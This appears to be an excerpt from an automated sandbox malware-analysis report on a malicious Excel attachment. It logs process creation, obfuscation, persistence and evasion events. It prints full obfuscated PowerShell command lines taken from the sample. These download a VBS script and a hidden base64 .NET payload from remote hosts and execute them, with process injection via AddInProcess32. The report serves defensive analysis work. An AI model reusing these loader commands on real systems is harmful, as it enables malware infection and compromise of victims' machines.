      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\createdbestthingswithniceworkgreat.vbS"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZh
ZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mans504x\mans504x.cmdline"
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD71D.tmp" "c:\Users\user\AppData\Local\Temp\mans504x\CSCCEA378A2A3F7449F819B5EAA6DFD95A.TMP"
      Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
      Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
      Source: Window Recorder Window detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
      Source: A & C Metrology OC 5457144.xls Static file information: File size 1081344 > 1048576
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\mans504x\mans504x.pdb source: powershell.exe, 00000011.00000002.488335048.00000000026E4000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\mans504x\mans504x.pdbhP source: powershell.exe, 00000011.00000002.488335048.00000000026E4000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.pdbhP source: powershell.exe, 00000005.00000002.458032894.0000000002351000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: 7C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.pdb source: powershell.exe, 00000005.00000002.458032894.0000000002351000.00000004.00000800.00020000.00000000.sdmp
      Source: 54330000.0.dr Initial sample: OLE indicators vbamacros = False
      Source: A & C Metrology OC 5457144.xls Initial sample: OLE indicators encrypted = True

      Data Obfuscation

      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $eNv:comSpeC[4,15,25]-join'') ( (('G2NimageUrl = m87https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvU'+'hBYwur m87;G2NwebClient = New-Object System.Net.WebClient;G2NimageBytes = G2NwebClient.DownloadData(G2NimageUrl);G2Nimage'+'Text = [System.Text.Encodi'+'ng]::UTF8.GetString(G2NimageByte'+'s);G2NstartFlag = m87<<BASE64_START>>m87;G2NendFlag = m87<<BASE64_END>>m'+'87;G2NstartIndex'+' = '+'G2Nim'+'ageText.IndexOf(G2NstartFlag);G2NendIndex = G2NimageText'+'.IndexOf'+'(G2NendFlag);G2NstartInd'+'ex '+'-ge 0 -and'+' G2NendIndex -gt G2NstartIndex;G2NstartIndex += G2NstartFlag.Le'+'ngth;G2Nbase64Length = G2NendIndex - G2NstartIndex;G2Nbase64C'+'ommand = G2NimageText.'+'Substring(G2Nst'+'artIn'+'dex, G2Nbase64Leng'+'th);G2Nbase64Reve'+'rsed = -join'+' (G2Nb'+'ase64Command.ToCharArray() '+'CIK ForEach-Object { G2N_ })[-1..-(G2Nbase64Command.Length)]'+';G2NcommandBytes = [System.Convert]::F'+'romBase64String(G2Nbase64Reversed);G2NloadedAssemb'+'ly = '+'[Syst'+'em.Reflection.As'+'sembly]::Load(G2NcommandBytes);G2NvaiMethod = [dnlib.IO.Home].GetMethod(m87VAIm87);G2NvaiMethod.Invoke(G2Nnull, @(m87txt.RDFFRE'+'/045'+'/8.512.012.291//:ptthm87, m87de'+'sativadom87, m'+'87desativa'+'dom87, m87desativadom87, m87AddInProcess32m87, m8'+'7desativadom87, m8'+'7desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desativadom87,m87desati'+'vadom87,m871m87,m87desativadom87));') -REPLaCE([CHAr]71+[CHAr]50+[CHAr]78),[CHAr]36-REPLaCE'm87',[CHAr]39-CrepLAcE ([CHAr]67+[CHAr]73+[CHAr]75),[CHAr]124) )"
      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syStem32\wiNdOWSPOwErsHElL\v1.0\POWeRshElL.eXE" "PoWeRSheLl.Exe -ex BYpass -NoP -W 1 -c dEvIcECRedEntiaLdePlOymeNt ; iEx($(Iex('[SysTem.TEXT.ENcoDIng]'+[chAR]58+[CHaR]0x3A+'Utf8.gETSTRING([SYStEM.COnVErT]'+[Char]58+[CHar]0x3a+'frOMbaSE64StrInG('+[cHar]34+'JGJxbElEWUQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTWVNQmVyREVmaW5pdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYdHJiSHMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBubGNyLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR3l2cix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJicSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1FU3BhQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpYYSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGJxbElEWUQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS44LzU0MC9jcmVhdGVkYmVzdHRoaW5nc3dpdGhuaWNld29ya2dyZWF0aC50SUYiLCIkRW5WOkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMiLDAsMCk7U1RhUlQtc0xlZVAoMyk7c3RBclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcY3JlYXRlZGJlc3R0aGluZ3N3aXRobmljZXdvcmtncmVhdC52YlMi'+[CHAr]0X22+'))')))"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRlTnY6Y29tU3BlQ1s0LDE1LDI1XS1qb2luJycpICggKCgnRzJOaW1hZ2VVcmwgPSBtODdodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VScrJ2hCWXd1ciBtODc7RzJOd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDtHMk5pbWFnZUJ5dGVzID0gRzJOd2ViQ2xpZW50LkRvd25sb2FkRGF0YShHMk5pbWFnZVVybCk7RzJOaW1hZ2UnKydUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaScrJ25nXTo6VVRGOC5HZXRTdHJpbmcoRzJOaW1hZ2VCeXRlJysncyk7RzJOc3RhcnRGbGFnID0gbTg3PDxCQVNFNjRfU1RBUlQ+Pm04NztHMk5lbmRGbGFnID0gbTg3PDxCQVNFNjRfRU5EPj5tJysnODc7RzJOc3RhcnRJbmRleCcrJyA9ICcrJ0cyTmltJysnYWdlVGV4dC5JbmRleE9mKEcyTnN0YXJ0RmxhZyk7RzJOZW5kSW5kZXggPSBHMk5pbWFnZVRleHQnKycuSW5kZXhPZicrJyhHMk5lbmRGbGFnKTtHMk5zdGFydEluZCcrJ2V4ICcrJy1nZSAwIC1hbmQnKycgRzJOZW5kSW5kZXggLWd0IEcyTnN0YXJ0SW5kZXg7RzJOc3RhcnRJbmRleCArPSBHMk5zdGFydEZsYWcuTGUnKyduZ3RoO0cyTmJhc2U2NExlbmd0aCA9IEcyTmVuZEluZGV4IC0gRzJOc3RhcnRJbmRleDtHMk5iYXNlNjRDJysnb21tYW5kID0gRzJOaW1hZ2VUZXh0LicrJ1N1YnN0cmluZyhHMk5zdCcrJ2FydEluJysnZGV4LCBHMk5iYXNlNjRMZW5nJysndGgpO0cyTmJhc2U2NFJldmUnKydyc2VkID0gLWpvaW4nKycgKEcyTmInKydhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSAnKydDSUsgRm9yRWFjaC1PYmplY3QgeyBHMk5fIH0pWy0xLi4tKEcyTmJhc2U2NENvbW1hbmQuTGVuZ3RoKV0nKyc7RzJOY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RicrJ3JvbUJhc2U2NFN0cmluZyhHMk5iYXNlNjRSZXZlcnNlZCk7RzJObG9hZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdCcrJ2VtLlJlZmxlY3Rpb24uQXMnKydzZW1ibHldOjpMb2FkKEcyTmNvbW1hbmRCeXRlcyk7RzJOdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChtODdWQUltODcpO0cyTnZhaU1ldGhvZC5JbnZva2UoRzJObnVsbCwgQChtODd0eHQuUkRGRlJFJysnLzA0NScrJy84LjUxMi4wMTIuMjkxLy86cHR0aG04NywgbTg3ZGUnKydzYXRpdmFkb204NywgbScrJzg3ZGVzYXRpdmEnKydkb204NywgbTg3ZGVzYXRpdmFkb204NywgbTg3QWRkSW5Qcm9jZXNzMzJtODcsIG04JysnN2Rlc2F0aXZhZG9tODcsIG04JysnN2Rlc2F0aXZhZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGl2YWRvbTg3LG04N2Rlc2F0aXZh
ZG9tODcsbTg3ZGVzYXRpdmFkb204NyxtODdkZXNhdGknKyd2YWRvbTg3LG04NzFtODcsbTg3ZGVzYXRpdmFkb204NykpOycpIC1SRVBMYUNFKFtDSEFyXTcxK1tDSEFyXTUwK1tDSEFyXTc4KSxbQ0hBcl0zNi1SRVBMYUNFJ204NycsW0NIQXJdMzktQ3JlcExBY0UgIChbQ0hBcl02NytbQ0hBcl03MytbQ0hBcl03NSksW0NIQXJdMTI0KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.cmdline"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mans504x\mans504x.cmdline"
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_000007FE88E500BD pushad ; iretd 5_2_000007FE88E500C1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_000007FE88E5022D push eax; iretd 5_2_000007FE88E50241

      Persistence and Installation Behavior

      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\mans504x\mans504x.dll
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: A & C Metrology OC 5457144.xls Stream path 'Workbook' entropy: 7.99864523402 (max. 8.0)
      Source: 54330000.0.dr Stream path 'Workbook' entropy: 7.99847056553 (max. 8.0)
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_000007FE88F2314B rdtsc 5_2_000007FE88F2314B
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000
      Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5370
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1668
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2925
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5075
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 774
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1409
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 942
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8893
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2474
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2246
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2206
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1340
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 399
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1552
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8958
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 833
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\td4qmpaq\td4qmpaq.dll
      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\mans504x\mans504x.dll
      Source: C:\Windows\System32\mshta.exe TID: 3708 Thread sleep time: -600000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3872 Thread sleep time: -180000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3976 Thread sleep time: -1844674407370954s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3848 Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3904 Thread sleep count: 2925 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3904 Thread sleep count: 5075 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3952 Thread sleep time: -120000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3956 Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3932 Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2844 Thread sleep count: 774 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2844 Thread sleep count: 1409 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1960 Thread sleep time: -60000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1692 Thread sleep count: 942 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1692 Thread sleep count: 8893 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 808 Thread sleep time: -60000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2560 Thread sleep time: -10145709240540247s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2560 Thread sleep time: -600000s >= -30000s
      Source: C:\Windows\System32\mshta.exe TID: 1964 Thread sleep time: -480000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2180 Thread sleep count: 2474 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2180 Thread sleep count: 2246 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2372 Thread sleep time: -180000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2380 Thread sleep time: -1844674407370954s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 896 Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2992 Thread sleep count: 2206 > 30
